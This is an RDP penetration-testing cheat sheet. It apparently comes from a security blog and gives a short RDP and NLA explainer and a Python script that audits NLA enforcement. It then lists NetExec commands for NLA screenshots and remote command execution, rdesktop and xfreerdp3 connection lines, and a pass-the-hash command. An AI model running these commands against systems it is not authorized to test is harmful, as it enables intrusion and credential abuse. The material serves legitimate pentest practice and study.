
NetExec RDP


  • Remote Desktop Protocol (RDP) is a proprietary network protocol developed by Microsoft that lets users connect to and control another computer or device over a network connection.
  • It provides a graphical interface for remote access, so users can interact with the remote system as if they were physically present.
  • When Network Level Authentication (NLA) is enforced, the RDP service only accepts connections from clients that support NLA and authenticate before the session is established.
  • RDP operates on a client-server model: the client (local device) connects to the host (remote computer) on port 3389 by default and establishes an encrypted communication channel.
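
Whether a host actually enforces NLA can be audited before any credentials are involved. The following is an added example, not part of the original post: it builds an X.224 Connection Request that does not offer CredSSP and classifies the server's reply, so a listener that still accepts non-NLA connections can be flagged for hardening. The function names and sample reply bytes are constructed for illustration; the constants follow MS-RDPBCGR.

```python
import socket
import struct

# Protocol flags and message types from MS-RDPBCGR (RDP security negotiation)
PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0x1, 0x2, 0x8
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
HYBRID_REQUIRED_BY_SERVER = 0x05

def build_connection_request(requested=PROTOCOL_SSL):
    """TPKT + X.224 Connection Request with an RDP_NEG_REQ that omits CredSSP."""
    neg = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested)
    x224 = struct.pack(">BBHHB", 6 + len(neg), 0xE0, 0, 0, 0) + neg
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224

def classify_response(data):
    """Map the server's X.224 Connection Confirm to an NLA verdict."""
    if len(data) < 11 or data[0] != 3 or (data[5] & 0xF0) != 0xD0:
        return "inconclusive"        # not a TPKT / Connection Confirm
    if len(data) < 19:
        return "nla_not_enforced"    # no negotiation block: legacy RDP security
    neg_type, _flags, _length, value = struct.unpack_from("<BBHI", data, 11)
    if neg_type == TYPE_RDP_NEG_FAILURE:
        # Only HYBRID_REQUIRED_BY_SERVER proves that CredSSP (NLA) is mandatory
        return "nla_enforced" if value == HYBRID_REQUIRED_BY_SERVER else "inconclusive"
    if neg_type == TYPE_RDP_NEG_RSP:
        # The server accepted a request that did not offer CredSSP
        nla = value & (PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX)
        return "nla_enforced" if nla else "nla_not_enforced"
    return "inconclusive"

def check_host(host, port=3389, timeout=5.0):
    """Audit one RDP listener in your own inventory and classify its reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request())
        return classify_response(s.recv(1024))

# Constructed sample replies (not captured traffic)
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed000001234000300080005000000")
SAMPLE_TLS_ACCEPTED = bytes.fromhex("030000130ed000001234000200080001000000")
SAMPLE_LEGACY_ONLY = bytes.fromhex("0300000b06d00000123400")

if __name__ == "__main__":
    for name, raw in [("nla required", SAMPLE_NLA_REQUIRED),
                      ("tls accepted", SAMPLE_TLS_ACCEPTED),
                      ("legacy only", SAMPLE_LEGACY_ONLY)]:
        print(name, "->", classify_response(raw))
```

A verdict of nla_not_enforced means the pre-authentication login screen is reachable without credentials, which is the condition the NLA screenshot check below relies on.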

Nmap Enum

nmap -sV -sC "$ip" -p3389 --script "rdp*" -Pn

NetExec Enum

NLA Attack

nxc rdp $ip --nla-screenshot

Normal Screenshot (Needs Auth)

nxc rdp $ip -u "$user" -p "$pass" --screenshot

Command Execution

nxc rdp $ip -u "$user" -p "$pass" -x whoami

Connect

Remmina

remmina    # a graphical RDP tool

rdesktop

rdesktop -u "$user" -d "$Domain" -p "$pass" $ip:3389

xfreerdp3

xfreerdp3 /u:"$user" /p:"$password" /v:$ip

Pass-The-Hash

xfreerdp3 /v:$IP /u:$USER /pth:$HASH

This post is licensed under CC BY 4.0 by the author.